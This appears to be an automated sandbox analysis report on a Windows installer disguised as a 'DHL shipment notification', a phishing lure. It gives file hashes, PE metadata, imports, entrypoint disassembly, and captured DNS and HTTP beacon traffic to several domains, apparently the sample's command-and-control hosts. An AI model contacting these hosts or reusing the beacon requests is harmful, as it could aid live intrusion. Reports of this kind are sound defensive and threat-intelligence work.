                      SHA1:543635DE72F333E9CF19CBA7B0DE572C33AB0E43
                      SHA-256:E9A70DEEF4CDAD4801C117EA5FAF227EFF7026ADBADF19FCC1DEA95674A8E3A0
                      SHA-512:237666835BF885924CFDF5955F6D1583269EE070C9A69EA3835C06A1C60EDDAEC8A19265CB1ED13035F44E335D161B22B0266D1F0F8855E6C0996E425699BD61
                      Malicious:false
                      Reputation:low
                      Preview:.5911.....q.....!1@..@Dv.@..@Dv...)1.v-Y111..%10.=0.A.v)..,111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....0.=0.A.v)...111.v....A5.k.9...44v=.v.....vA..5d..v..~..v..~-.5.d..A.(".v.4.-.5.v-....%..!.d.1111.5U6.\.-0...0...0..r.0..r.0...0....'.A.y.=(.y.}%Q..2.!0..r..v9@6.v!4.-.1111.uU5T111.5U>...%...v!.....=1.....@..@Dv).v9.1lv=.Q.v9.1.~A.E.u.5..).v-.v9.1q.~9.2.v)..-..=1.G+....311..311.E1..0....311..311.91.>....311.u311.91.....Y@..@Dv..v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)...y611..w.v9.9...1.u>...>..v..9...1.u>...>..3.9...1.u6....0....211....00.v%.@.v..0.9.{000.v%..%1.7..!1.8.v!2111.v!..51.....q@..@Dv..v)Y111.v.v-..)1.G.v-.11.v-q.v-.v)y.v)....511..@..111.v9.9...1.u>.>..v=.9...1.u>.>..vA.9....u>.>..vEd..9...4.uF.}F..v..9...3.u>.>..6.9...1.u6.G+....111...-00.v%..I1.9.v..~I.2.H0.I0.E0.A0.=0.9.j/00.v%..%1.7..!1.8.v!2111.v!..E1.....M.v)A111.v..v-..)1.G.v-.11.v-q.v-.v)y.v)....411..w.v9.9...1.u>...>..v=.9...1.u>...>..3.9...1.u6...>...V111..]-00.v%.?0.=0.9...0

                      C:\Users\user\AppData\Local\Temp\nsk2671.tmp

                      Download File
                      Process:C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):289971
                      Entropy (8bit):7.540713997849172
                      Encrypted:false
                      SSDEEP:6144:JxfxAwWS39q6JsM8U1dWvo+XjZ6dpz89BY2LZwAOuu28u:J/UQlr8sdijQD89LZwSu2J
                      MD5:CD439B40B1EE8F92D024EE3F27772BB3
                      SHA1:8276D5F64B59E97CC2A965B11634FB5CA6454548
                      SHA-256:7DF3145A379DFF6BAE9572B07B4F208AF2ECEA35457A79E3AF440C6C254E3A11
                      SHA-512:054AD8E0CC4501E02E9FDA325A0DC0C6B0807E8D7C8331D6B0D04C31BC0F7D796E6651F1F006FD8020061886E0882FB8F953A9A1C84AB0D48F8B021654D7D116
                      Malicious:false
                      Reputation:low
                      Preview:*;......,................"..k....-......L:.......;..........................................................................................................................................................................................................................................G...............7...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.915673728517711
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File size:278331
                      MD5:8fbdf9f70b21179d87b83fe47b2137dd
                      SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
                      SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
                      SHA512:4677bcdcaf115ff555b04d00db60fcd12a02be178a95e401bcbccf4130e347fcc315579fa72f7055f490009fcaf3bb4c14cc119432ff1b89756f6f6d5ec62abe
                      SSDEEP:6144:LOtIO6psx/OTz8giqoW/rOiY8FWB55z44pvVwVlTc7:LOL4sBOTYgjFyGcB5h9pcE
                      TLSH:A44412053A44D43BFD3722734E3766738E6E471442B94B1BB3E126257E719C2AB1EB81
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x403646
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F1EB8BBA36Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F1EB8BBA33Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [007A8B58h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000xa50.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x3b90000xa500xc00False0.401692708333data4.18753619353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x3b91900x2e8dataEnglishUnited States
                      RT_DIALOG0x3b94780x100dataEnglishUnited States
                      RT_DIALOG0x3b95780x11cdataEnglishUnited States
                      RT_DIALOG0x3b96980x60dataEnglishUnited States
                      RT_GROUP_ICON0x3b96f80x14dataEnglishUnited States
                      RT_MANIFEST0x3b97100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 13, 2022 16:10:37.252978086 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.269717932 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.269814014 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.269937038 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.286659002 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426731110 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426786900 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426815987 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426949978 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.427006960 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.428131104 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.428225040 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.428282976 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.428313971 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:57.716248035 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.733297110 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.733407974 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.733571053 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.750320911 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795728922 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795795918 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795835972 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795855999 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.795876026 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795908928 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795924902 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.795937061 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795967102 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.796086073 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.796102047 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.796107054 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.812993050 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.813087940 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:11:20.068773985 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.088573933 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.088706017 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.088871002 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.108211994 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108275890 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108305931 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108448982 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.108520031 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.127751112 CEST80497773.64.163.50192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 13, 2022 16:10:37.212352991 CEST6064753192.168.2.48.8.8.8
                      May 13, 2022 16:10:37.247565985 CEST53606478.8.8.8192.168.2.4
                      May 13, 2022 16:10:57.684124947 CEST6490953192.168.2.48.8.8.8
                      May 13, 2022 16:10:57.714978933 CEST53649098.8.8.8192.168.2.4
                      May 13, 2022 16:11:20.044547081 CEST6038153192.168.2.48.8.8.8
                      May 13, 2022 16:11:20.067533016 CEST53603818.8.8.8192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      May 13, 2022 16:10:37.212352991 CEST192.168.2.48.8.8.80x190eStandard query (0)www.rtpholywin99.comA (IP address)IN (0x0001)
                      May 13, 2022 16:10:57.684124947 CEST192.168.2.48.8.8.80x2690Standard query (0)www.keilaniclothing.comA (IP address)IN (0x0001)
                      May 13, 2022 16:11:20.044547081 CEST192.168.2.48.8.8.80xdfdeStandard query (0)www.ultrakill.xyzA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      May 13, 2022 16:10:37.247565985 CEST8.8.8.8192.168.2.40x190eNo error (0)www.rtpholywin99.comghs.google.comCNAME (Canonical name)IN (0x0001)
                      May 13, 2022 16:10:37.247565985 CEST8.8.8.8192.168.2.40x190eNo error (0)ghs.google.com142.250.185.115A (IP address)IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST8.8.8.8192.168.2.40x2690No error (0)www.keilaniclothing.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST8.8.8.8192.168.2.40x2690No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                      May 13, 2022 16:11:20.067533016 CEST8.8.8.8192.168.2.40xdfdeNo error (0)www.ultrakill.xyz3.64.163.50A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.rtpholywin99.com
                      • www.keilaniclothing.com
                      • www.ultrakill.xyz

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449773142.250.185.11580C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:10:37.269937038 CEST9887OUTGET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1
                      Host: www.rtpholywin99.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:37.426731110 CEST9888INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 13 May 2022 14:10:37 GMT
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 62 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 6f 67 67 65 72 20 69 73 20 61 20 62 6c 6f 67 20 70 75 62 6c 69 73 68 69 6e 67 20 74 6f 6f 6c 20 66 72 6f 6d 20 47 6f 6f 67 6c 65 20 66 6f 72 20 65 61 73 69 6c 79 20 73 68 61 72 69 6e 67 20 79 6f 75 72 20 74 68 6f 75 67 68 74 73 20 77 69 74 68 20 74 68 65 20 77 6f 72 6c 64 2e 20 42 6c 6f 67 67 65 72 20 6d 61 6b 65 73 20 69 74 20 73 69 6d 70 6c 65 20 74 6f 20 70 6f 73 74 20 74 65 78 74 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 76 69 64 65 6f 20 6f 6e 74 6f 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 20 6f 72 20 74 65 61 6d 20 62 6c 6f 67 2e 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 6f 67 67 65 72 2c 20 62 6c 6f 67 73 70 6f 74 2c 20 62 6c 6f 67 2c 20 62 6c 6f 67 67 65 72 2e 63 6f 6d 2c 20 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2c 20 70 65 72 73 6f 6e 61 6c 20 62 6c 6f 67 2c 20 77 65 62 6c 6f 67 2c 20 63 72 65 61 74 65 20 62 6c 6f 67 2c 20 6e 65 77 20 62 6c 6f 67 22 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 23 68 6f 6d 65 42 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 76 2d 63 73 73 2f 33 38 39 36 35 35 38 36 37 33 2d 6e 65 77 5f 75 69 5f 73 74 61 74 69 63 5f 70 61 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 65 6e 20 72 62 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 67 61 3d 77 69 6e 64 6f 77 2e 67 61 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 67 61 2e 71 3d 67 61 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72
                      Data Ascii: b12<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="description" content="Blogger is a blog publishing tool from Google for easily sharing your thoughts with the world. Blogger makes it simple to post text, photos and video onto your personal or team blog."> <meta name="keywords" content="blogger, blogspot, blog, blogger.com, blogspot.com, personal blog, weblog, create blog, new blog"><base href="https://www.blogger.com"><title>Page not found</title><style type="text/css"> #homeButton { width: 270px; } </style><link href="https://www.blogger.com/static/v1/v-css/3896558673-new_ui_static_pages.css" rel="stylesheet" type="text/css"></head><body class="lang_en rb"><script type="text/javascript"> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(ar


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.44977523.227.38.7480C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:10:57.733571053 CEST11587OUTGET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1
                      Host: www.keilaniclothing.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:57.795728922 CEST11589INHTTP/1.1 403 Forbidden
                      Date: Fri, 13 May 2022 14:10:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      X-Sorting-Hat-PodId: 250
                      X-Sorting-Hat-ShopId: 64045383931
                      X-Dc: gcp-europe-west1
                      X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
                      X-XSS-Protection: 1; mode=block
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-Permitted-Cross-Domain-Policies: none
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 70abfb06ecb2917d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
